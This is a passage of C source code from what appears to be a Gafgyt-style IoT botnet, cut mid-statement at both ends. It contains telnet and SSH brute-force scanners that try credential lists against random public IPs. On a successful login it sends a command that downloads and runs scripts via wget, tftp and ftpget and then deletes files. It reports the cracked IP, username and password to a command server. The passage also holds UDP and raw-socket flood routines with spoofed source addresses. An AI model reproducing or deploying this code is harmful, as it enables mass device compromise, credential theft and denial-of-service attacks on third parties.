!= NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "denied") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "error") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "bad") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } fds[i].bufUsed = strlen(fds[i].sockbuf); } if(fds[i].totalTimeout + 10 < time(NULL)) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } } break; case 5: { if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } fds[i].state = 6; } break; case 6: { if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL); if(readUntil(fds[i].fd, "invalid", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "invalid") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "incorrect", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "incorrect") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "fail", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "fail") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "again", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "again") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "wrong", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "wrong") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "accessdenied", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "accessdenied") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "denied", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "denied") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "error", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "error") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "bad", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "bad") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } else { fds[i].bufUsed = strlen(fds[i].sockbuf); } if(fds[i].totalTimeout + 10 < time(NULL)) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } } break; case 7: { if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } fds[i].state = 8; } break; case 8: { if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } fds[i].state = 9; } break; case 9: { if(send(fds[i].fd, "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget http://0.0.0.0/gtop.sh; chmod 667 gtop.sh; sh gtop.sh; tftp 0.0.0.0 -c get tftp1.sh; chmod 667 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 0.0.0.0; chmod 667 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n", 394, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); fds[i].state = 10; } break; case 10: { echoLoader(); send(fds[i].fd, "sh x;busybox chmod +x z | | chmod +x z;./z;rm -rf z;rm -f x\r\n", 61, MSG_NOSIGNAL); fds[i].state = 11; } break; case 11: { if(send(fds[i].fd, "/bin/busybox;echo -e '\x67\x61\x79\x66\x67\x74'\r\n", 49, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } fds[i].state = 12; } case 12: { if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL); if(readUntil(fds[i].fd, "ulti-call", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; send(fds[i].fd, "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget http://0.0.0.0/gtop.sh; chmod 667 gtop.sh; sh gtop.sh; tftp 0.0.0.0 -c get tftp1.sh; chmod 667 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 0.0.0.0; chmod 667 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n", 394, MSG_NOSIGNAL); sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); continue; } else if(readUntil(fds[i].fd, "multi-call", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; send(fds[i].fd, "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget http://0.0.0.0/gtop.sh; chmod 667 gtop.sh; sh gtop.sh; tftp 0.0.0.0 -c get tftp1.sh; chmod 667 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 0.0.0.0; chmod 667 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n", 394, MSG_NOSIGNAL); sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); continue; } else if(readUntil(fds[i].fd, "gayfgt", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; send(fds[i].fd, "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget http://0.0.0.0/gtop.sh; chmod 667 gtop.sh; sh gtop.sh; tftp 0.0.0.0 -c get tftp1.sh; chmod 667 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 0.0.0.0; chmod 667 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n", 394, MSG_NOSIGNAL); sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].complete = 1; fds[i].state = 0; continue; } else { fds[i].bufUsed = strlen(fds[i].sockbuf); } if(fds[i].totalTimeout + 10 < time(NULL)) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } } break; } } } } void SSHScanner() { int max = (getdtablesize() / 4) * 3, i, res; fd_set myset; struct timeval tv; socklen_t lon; int valopt; max = max > 512 ? 512 : max; struct sockaddr_in dest_addr; dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(22); memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); struct telstate_t { int fd; uint32_t ip; uint8_t state; uint8_t complete; uint8_t usernameInd; uint8_t passwordInd; uint32_t totalTimeout; uint16_t bufUsed; char *sockbuf; } fds[max]; memset(fds, 0, max * (sizeof(int) + 1)); for(i = 0; i < max; i++) { fds[i].complete = 1; fds[i].sockbuf = malloc(1024); memset(fds[i].sockbuf, 0, 1024); } struct timeval timeout; timeout.tv_sec = 5; timeout.tv_usec = 0; while(1) { for(i = 0; i < max; i++) { switch(fds[i].state) { case 0: { memset(fds[i].sockbuf, 0, 1024); if(fds[i].complete) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = getRandomPublicIP(); } else { fds[i].passwordInd++; if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].passwordInd = 0; fds[i].usernameInd++; } if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; } } dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(22); memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); dest_addr.sin_addr.s_addr = fds[i].ip; fds[i].fd = socket(AF_INET, SOCK_STREAM, 0); setsockopt (fds[i].fd, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)); setsockopt (fds[i].fd, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)); if(fds[i].fd == -1) { continue; } fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK); if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { /*printf("close %lu\n",fds[i].ip);*/ sclose(fds[i].fd); fds[i].complete = 1; } else { fds[i].state = 1; fds[i].totalTimeout = 0; } } break; case 1: { if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL); FD_ZERO(&myset); FD_SET(fds[i].fd, &myset); tv.tv_sec = 0; tv.tv_usec = 10000; res = select(fds[i].fd+1, NULL, &myset, NULL, &tv); if(res == 1) { lon = sizeof(int); valopt = 0; getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if(valopt) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } else { fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK)); fds[i].totalTimeout = 0; fds[i].bufUsed = 0; memset(fds[i].sockbuf, 0, 1024); fds[i].state = 2; continue; } } else if(res == -1) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } if(fds[i].totalTimeout + 10 < time(NULL)) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } } break; case 2: { if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL); if(readUntil(fds[i].fd, "ogin:", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5; else memset(fds[i].sockbuf, 0, 1024); fds[i].state = 3; continue; } else if(readUntil(fds[i].fd, "user:", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5; else memset(fds[i].sockbuf, 0, 1024); fds[i].state = 3; continue; } else if(readUntil(fds[i].fd, "name", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5; else memset(fds[i].sockbuf, 0, 1024); fds[i].state = 3; continue; } else if(readUntil(fds[i].fd, "pass", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5; else memset(fds[i].sockbuf, 0, 1024); fds[i].state = 3; continue; } else if(readUntil(fds[i].fd, "word", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5; else memset(fds[i].sockbuf, 0, 1024); fds[i].state = 3; continue; } else { fds[i].bufUsed = strlen(fds[i].sockbuf); } if(fds[i].totalTimeout + 10 < time(NULL)) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } } break; case 3: { if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } fds[i].state = 4; } break; case 4: { if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL); if(readUntil(fds[i].fd, "pass", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "pass") != NULL) fds[i].state = 5; else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "word", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "word") != NULL) fds[i].state = 5; else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } else { if(strstr(fds[i].sockbuf, "invalid") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "incorrect") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "fail") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "again") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "wrong") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "accessdenied") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "denied") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "error") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "bad") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } fds[i].bufUsed = strlen(fds[i].sockbuf); } if(fds[i].totalTimeout + 10 < time(NULL)) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } } break; case 5: { if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } fds[i].state = 6; } break; case 6: { if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL); if(readUntil(fds[i].fd, "invalid", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "invalid") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "incorrect", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "incorrect") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "fail", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "fail") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "again", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "again") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "wrong", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "wrong") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "accessdenied", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "accessdenied") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "denied", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "denied") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "error", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "error") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "bad", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "bad") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } else { fds[i].bufUsed = strlen(fds[i].sockbuf); } if(fds[i].totalTimeout + 10 < time(NULL)) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } } break; case 7: { if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } fds[i].state = 8; } break; case 8: { if(send(fds[i].fd, "/bin/sh\r\n", 9, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } fds[i].state = 9; } break; case 9: { if(send(fds[i].fd, "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget http://0.0.0.0/gtop.sh; chmod 667 gtop.sh; sh gtop.sh; tftp 0.0.0.0 -c get tftp1.sh; chmod 667 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 0.0.0.0; chmod 667 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n", 394, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); fds[i].state = 10; } break; case 10: { if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL); if(readUntil(fds[i].fd, "ulti-call", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; send(fds[i].fd, "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget http://0.0.0.0/gtop.sh; chmod 667 gtop.sh; sh gtop.sh; tftp 0.0.0.0 -c get tftp1.sh; chmod 667 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 0.0.0.0; chmod 667 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n", 394, MSG_NOSIGNAL); sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); continue; } else if(readUntil(fds[i].fd, "multi-call", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; send(fds[i].fd, "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget http://0.0.0.0/gtop.sh; chmod 667 gtop.sh; sh gtop.sh; tftp 0.0.0.0 -c get tftp1.sh; chmod 667 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 0.0.0.0; chmod 667 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n", 394, MSG_NOSIGNAL); sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); continue; } else if(readUntil(fds[i].fd, "gayfgt", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; send(fds[i].fd, "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget http://0.0.0.0/gtop.sh; chmod 667 gtop.sh; sh gtop.sh; tftp 0.0.0.0 -c get tftp1.sh; chmod 667 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 0.0.0.0; chmod 667 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n", 394, MSG_NOSIGNAL); sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].complete = 1; fds[i].state = 0; continue; } else { fds[i].bufUsed = strlen(fds[i].sockbuf); } if(fds[i].totalTimeout + 10 < time(NULL)) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } } break; } } } } void sendSTD(unsigned char *ip, int port, int secs) { int iSTD_Sock; iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0); time_t start = time(NULL); struct sockaddr_in sin; struct hostent *hp; hp = gethostbyname(ip); bzero((char*) &sin,sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = port; unsigned int a = 0; while(1){ if (a >= 50) { send(iSTD_Sock, STD2_STRING, STD2_SIZE, 0); connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin)); if (time(NULL) >= start + secs) { close(iSTD_Sock); _exit(0); } a = 0; } a++; } } void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval) { struct sockaddr_in dest_addr; dest_addr.sin_family = AF_INET; if(port == 0) dest_addr.sin_port = rand_cmwc(); else dest_addr.sin_port = htons(port); if(getHost(target, &dest_addr.sin_addr)) return; memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); register unsigned int pollRegister; pollRegister = pollinterval; if(spoofit == 32) { int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(!sockfd) { sockprintf(mainCommSock, "Failed opening raw socket."); return; } unsigned char *buf = (unsigned char *)malloc(packetsize + 1); if(buf == NULL) return; memset(buf, 0, packetsize + 1); makeRandomStr(buf, packetsize); int end = time(NULL) + timeEnd; register unsigned int i = 0; while(1) { sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr)); if(i == pollRegister) { if(port == 0) dest_addr.sin_port = rand_cmwc(); if(time(NULL) > end) break; i = 0; continue; } i++; } } else { int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); if(!sockfd) { sockprintf(mainCommSock, "Failed opening raw socket."); //sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); return; } int tmp = 1; if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) { sockprintf(mainCommSock, "Failed setting raw headers mode."); return; } int counter = 50; while(counter--) { srand(time(NULL) ^ rand_cmwc()); init_rand(rand()); } in_addr_t netmask; if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) ); else netmask = ( ~((1 << (32 - spoofit)) - 1) ); unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize]; struct iphdr *iph = (struct iphdr *)packet; struct udphdr *udph = (void *)iph + sizeof(struct iphdr); makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize); udph->len = htons(sizeof(struct udphdr) + packetsize); udph->source = rand_cmwc(); udph->dest = (port == 0 ? rand_cmwc() : htons(port)); udph->check = 0; makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize); iph->check = csum ((unsigned short *) packet, iph->tot_len); int end = time(NULL) 